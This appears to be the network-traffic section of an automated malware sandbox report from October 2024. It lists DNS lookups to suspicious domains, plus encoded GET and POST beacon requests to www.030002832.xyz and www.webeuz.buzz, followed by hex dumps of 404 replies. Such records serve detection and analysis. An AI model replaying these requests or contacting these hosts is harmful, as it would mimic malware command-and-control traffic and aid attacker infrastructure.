            Source: global trafficHTTP traffic detected: GET /k59q/?Vt8pNT=pYctcHUd+6Fx/IsQ6ix4omD59tSF7jXbTnpFZTzQh111IIx+Ebp2Fnu84te/oL49aHMAArF6WbZdbX7DMbbg+4GhF928ELxk6g386YHHrAtOiLYQc82sN3s=&e4x=ktCxONu0 HTTP/1.1Host: www.030002832.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.wishlists.fun
            Source: global trafficDNS traffic detected: DNS query: www.webeuz.buzz
            Source: global trafficDNS traffic detected: DNS query: www.b-ambu.com
            Source: global trafficDNS traffic detected: DNS query: www.weeksee.net
            Source: global trafficDNS traffic detected: DNS query: www.ddzc.store
            Source: global trafficDNS traffic detected: DNS query: www.trencheslondon.store
            Source: global trafficDNS traffic detected: DNS query: www.i8ty.xyz
            Source: global trafficDNS traffic detected: DNS query: www.030002832.xyz
            Source: unknownHTTP traffic detected: POST /pw0n/ HTTP/1.1Host: www.webeuz.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.webeuz.buzzReferer: http://www.webeuz.buzz/pw0n/Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 203Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36Data Raw: 56 74 38 70 4e 54 3d 75 49 2b 41 61 70 43 43 35 32 6a 36 71 65 50 45 64 72 31 68 38 6c 38 56 72 42 75 71 36 48 79 6a 2f 57 64 32 30 64 51 73 63 69 6f 7a 46 58 66 42 59 4b 43 41 30 39 49 2b 49 58 33 54 59 75 44 54 6d 74 6a 54 57 4a 59 48 32 62 2f 32 4e 6c 4e 4f 6b 79 6b 41 33 2f 33 72 73 30 69 49 61 53 38 49 4a 41 49 67 35 43 4e 6a 79 32 68 6a 7a 4c 4a 6c 45 63 6c 44 42 49 50 53 58 50 32 73 67 6a 49 70 75 49 6a 55 43 6c 47 4d 6a 57 33 39 31 4e 7a 53 6a 45 46 46 36 6c 78 53 45 39 6b 36 63 32 64 34 76 62 37 4e 4e 47 72 70 48 45 2b 42 2b 68 67 73 66 53 5a 44 41 71 53 4b 6a 58 46 34 71 43 74 42 53 51 3d 3d Data Ascii: Vt8pNT=uI+AapCC52j6qePEdr1h8l8VrBuq6Hyj/Wd20dQsciozFXfBYKCA09I+IX3TYuDTmtjTWJYH2b/2NlNOkykA3/3rs0iIaS8IJAIg5CNjy2hjzLJlEclDBIPSXP2sgjIpuIjUClGMjW391NzSjEFF6lxSE9k6c2d4vb7NNGrpHE+B+hgsfSZDAqSKjXF4qCtBSQ==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 11 Oct 2024 14:47:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 31 0b c2 30 10 85 77 c1 ff 70 6e 3a a4 69 a1 83 43 c8 22 0a 0e ba 88 3f 20 f5 ce 36 90 5e 24 a6 60 ff bd a9 b6 20 ce 8e 8e f7 ee 7b 8f c7 53 4d 6c 9d 9e cf 54 43 06 b5 8a 36 3a d2 65 5e c2 d1 47 d8 f9 8e 51 c9 b7 a8 e4 0b 49 68 e5 b1 1f 2c 17 e2 48 41 ab a6 f8 76 24 45 c9 f1 3d 64 27 68 bc b8 b6 fc 90 45 56 ac b3 1c 96 e7 aa e3 d8 ad 3e 59 39 a5 cb a9 d9 42 08 30 70 33 88 96 6b 88 1e d0 de 4d e5 08 0e a7 fd 16 0c 23 6c 9a e0 5b 82 6b b0 c4 e8 7a a0 10 7c 48 8e 9a 40 88 a1 e9 3f e2 97 5b 3c 01 2a b6 49 35 34 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ba10wpn:iC"? 6^$` {SMlTC6:e^GQIh,HAv$E=d'hEV>Y9B0p3kM#l[kz|H@?[<*I540
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 11 Oct 2024 14:47:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 31 0b c2 30 10 85 77 c1 ff 70 6e 3a a4 69 a1 83 43 c8 22 0a 0e ba 88 3f 20 f5 ce 36 90 5e 24 a6 60 ff bd a9 b6 20 ce 8e 8e f7 ee 7b 8f c7 53 4d 6c 9d 9e cf 54 43 06 b5 8a 36 3a d2 65 5e c2 d1 47 d8 f9 8e 51 c9 b7 a8 e4 0b 49 68 e5 b1 1f 2c 17 e2 48 41 ab a6 f8 76 24 45 c9 f1 3d 64 27 68 bc b8 b6 fc 90 45 56 ac b3 1c 96 e7 aa e3 d8 ad 3e 59 39 a5 cb a9 d9 42 08 30 70 33 88 96 6b 88 1e d0 de 4d e5 08 0e a7 fd 16 0c 23 6c 9a e0 5b 82 6b b0 c4 e8 7a a0 10 7c 48 8e 9a 40 88 a1 e9 3f e2 97 5b 3c 01 2a b6 49 35 34 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ba10wpn:iC"? 6^$` {SMlTC6:e^GQIh,HAv$E=d'hEV>Y9B0p3kM#l[kz|H@?[<*I540
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 11 Oct 2024 14:47:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 31 0b c2 30 10 85 77 c1 ff 70 6e 3a a4 69 a1 83 43 c8 22 0a 0e ba 88 3f 20 f5 ce 36 90 5e 24 a6 60 ff bd a9 b6 20 ce 8e 8e f7 ee 7b 8f c7 53 4d 6c 9d 9e cf 54 43 06 b5 8a 36 3a d2 65 5e c2 d1 47 d8 f9 8e 51 c9 b7 a8 e4 0b 49 68 e5 b1 1f 2c 17 e2 48 41 ab a6 f8 76 24 45 c9 f1 3d 64 27 68 bc b8 b6 fc 90 45 56 ac b3 1c 96 e7 aa e3 d8 ad 3e 59 39 a5 cb a9 d9 42 08 30 70 33 88 96 6b 88 1e d0 de 4d e5 08 0e a7 fd 16 0c 23 6c 9a e0 5b 82 6b b0 c4 e8 7a a0 10 7c 48 8e 9a 40 88 a1 e9 3f e2 97 5b 3c 01 2a b6 49 35 34 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ba10wpn:iC"? 6^$` {SMlTC6:e^GQIh,HAv$E=d'hEV>Y9B0p3kM#l[kz|H@?[<*I540
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 11 Oct 2024 14:47:14 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 11 Oct 2024 14:48:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2BFCE5A043D4DA88C1C7A994DA64FEC1EC6CA33F30F37C75A60D77B67800Set-Cookie: _csrf=ddeeaf19bd497098f1c9660f9137199be787e713b15b53910197d0e6a0f29eefa%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22CdwJzH2l7slEGdMPw4J6H2UlrSkBzCws%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 64 44 6c 45 55 76 53 36 35 5f 4f 34 52 4a 48 4c 6d 4a 62 48 75 57 35 51 4b 73 77 31 35 6e 34 61 35 68 4d 49 4e 77 45 6a 66 79 41 33 58 54 4d 59 6a 76 4c 56 6e 34 38 33 5f 59 37 66 38 6f 72 70 47 57 52 67 2d 6e 33 55 4b 33 61 55 51 47 4e 31 65 32 41 49 55 77 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" conten
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 11 Oct 2024 14:48:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2BC80F9409633CC19BA4248B29B6CA3C138EA349CF2E1A4C13F5246AB600Set-Cookie: _csrf=7b4d071a38956ce7691482f1f89bec8321692882b4bcbe0317fea5ec26cf14eaa%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%222qkML5zSYmVAtokF6VRpPh498aW0bIrU%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 50 36 34 70 6a 32 2d 59 2d 55 36 50 68 4e 76 34 75 50 54 30 41 69 6b 2d 68 45 49 30 50 6e 56 51 30 76 74 2d 4c 39 54 42 31 69 6f 4e 33 30 4c 43 49 36 32 44 48 64 62 70 6a 62 6e 4d 6d 35 39 45 48 32 6a 57 4d 6d 52 57 51 57 6e 71 6d 69 6b 66 74 6f 69 6b 66 77 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" conten
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 11 Oct 2024 14:48:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2B9BD6AA89CE29090D0389CDF341A5E18A6E39E8E2A24B305311DBF83800Set-Cookie: _csrf=5dcbb179e6dce9e2a23c8e888aaf3f12674e839126835424f7c66abc3fcb3c79a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%223-AGKKWEDQR4bmHqsr5Rdz1TuoMlPoju%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 32 79 33 48 44 30 39 6b 32 5f 5f 31 76 2d 76 6d 41 77 6f 33 55 45 53 54 76 6c 6a 34 5a 46 79 2d 62 37 37 48 71 6e 35 34 49 6f 72 6f 41 49 5a 49 42 43 2d 4d 75 72 48 75 75 64 4a 68 5a 33 38 68 4e 2d 47 4c 43 70 77 65 62 65 6f 61 30 59 72 47 4c 68 64 49 5f 77 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" conten
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 11 Oct 2024 14:48:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2BD080900B47ADA9B697A8CA495E13725ADA1691D6AFB2C4FE121341F700Set-Cookie: _csrf=0f243aabf7e768b8f26c18949aab256bb020f9ab13b5d85a332d177a2fb17419a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%225P40QjBFaA0YHvzpEe_UYU5zZxYU8W00%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 55 6d 79 49 76 67 73 56 48 6f 6b 2d 45 4b 4c 37 6d 32 34 4b 78 41 7a 51 36 6d 33 30 6c 50 46 58 69 47 51 39 69 4e 4e 54 70 53 74 6e 50 4c 79 4f 57 6e 39 63 7a 31 39 52 6b 71 4c 54 47 48 43 30 53 62 57 31 4f 4b 33 42 78 43 33 53 48 47 54 64 36 77 53 56 47 77 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" conten
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 11 Oct 2024 14:48:22 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 